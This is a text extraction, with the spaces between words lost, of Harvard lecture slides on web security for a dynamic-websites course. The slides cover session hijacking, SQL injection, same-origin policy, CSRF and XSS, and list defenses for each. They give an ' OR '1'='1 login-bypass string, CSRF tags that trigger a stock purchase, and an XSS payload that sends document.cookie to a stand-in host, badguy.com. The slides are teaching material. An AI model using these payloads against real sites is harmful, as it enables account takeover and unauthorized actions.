哈佛大学 构建动态网站 php lecture11 安全 security

0ComputerScienceE-75BuildingDynamicWebsitesHarvardExtensionSchool:SecurityDavidJ.Malanmalan@post.harvard.edu1ObviousThreats„Telnet„FTP„HTTP„MySQL„...2suPHP:Sat,05Apr200822:28:25GMTServer:Apache/2X-Powered-By:PHP/5.2.5Expires:Thu,19Nov198108:52:00GMTCache-Control:no-store,no-cache,must-revalidate,post-check=0,pre-check=0Pragma:no-cacheSet-Cookie:PHPSESSID=5899f546557421d38d74b659e5bf384f;path=/Set-Cookie:secret=12345Vary:Accept-Encoding,User-AgentContent-Encoding:gzipContent-Length:261Keep-Alive:timeout=1,max=100Connection:Keep-AliveContent-Type:text/htmlImagefromsgc.se.4SessionHijacking(scenarios)„PhysicalAccess„PacketSniffing„SessionFixation„XSS5SessionHijacking(defenses)„Hard-to-guesssessionkeys?„Rekeysession?„CheckIPaddress?„Encryption?6SSLImagefromgodaddy.com.7Public-KeyCryptographyImagefrom(DLP)FigurebyRadiaPerlman.9SQLInjectionAttacks$result=mysql_query(sprintf(SELECTuidFROMusersWHEREusername='%s'ANDpassword='%s',$_POST[username],$_POST[password]));10SQLInjectionAttacksSELECTuidFROMusersWHEREusername='jharvard'ANDpassword='12345'OR'1'='1'11SQLInjectionAttacks$result=mysql_query(sprintf(SELECTuidFROMusersWHEREusername='%s'ANDpassword='%s',mysql_real_escape_string($_POST[username]),mysql_real_escape_string($_POST[password])));12SQLInjectionAttacksSELECTuidFROMusersWHEREusername='jharvard'ANDpassword='12345\'OR\'1\'=\'1'13TheSame-OriginPolicy“Thesameoriginpolicypreventsdocumentorscriptloadedfromoneoriginfromgettingorsettingpropertiesofadocumentfromadifferentorigin...Mozillaconsiderstwopagestohavethesameoriginiftheprotocol,port(ifgiven),andhostarethesameforbothpages.Toillustrate,thistablegivesexamplesoforigincomparisonstotheURL”Excerptedfrom„Windows„Frames„EmbeddedObjects„Cookies„XmlHttpRequest15Attacks„Cross-SiteRequestForgery(CSRF/XSRF)„Cross-SiteScripting(XSS)„...16CSRF/XSRF(scenario)1.Youlogintoproject2.domain.tld.2.Youthenvisitabadguy’ssite.3.Badguy’ssitecontainsalinkto=INFX.PK4.Youunwittinglybuythepennystock!17CSRF/XSRF(implementations)„imgsrc==INFX.PK/„scriptsrc==INFX.PK/script„iframesrc==INFX.PK/„scripttype=text/javascript//[CDATA[varimg=newImage();img.src==INFX.PK;//]]/script„...18CSRF/XSRF(defenses)ƒUsePOSTforsensitiveactions?ƒUseHTTP_REFERER?ƒAppendsessiontokenstoURLs?ƒExpiresessionsquickly?ƒCAPTCHAs?ƒPromptusertore-login?19XSS(scenario)1.Youclickalinklike=scriptdocument.location='='+document.cookie/scriptor,really,=%3Cscript%3Edocument.location%3D'http%3A%2F%2Fbadguy.com%2Flog.php%3Fcookie%3D'%2Bdocument.cookie%3C%2Fscript%3E2.vulnerable.commakesthemistakeofwritingvalueoffootoitsbody3.badguy.comgetsyourcookies!20XSS(defenses)ƒDon’tclicklinks?ƒDon’ttrustuserinput?ƒEncodealluserinput?21ComputerScienceE-75BuildingDynamicWebsitesHarvardExtensionSchool:SecurityDavidJ.Malanmalan@post.harvard.edu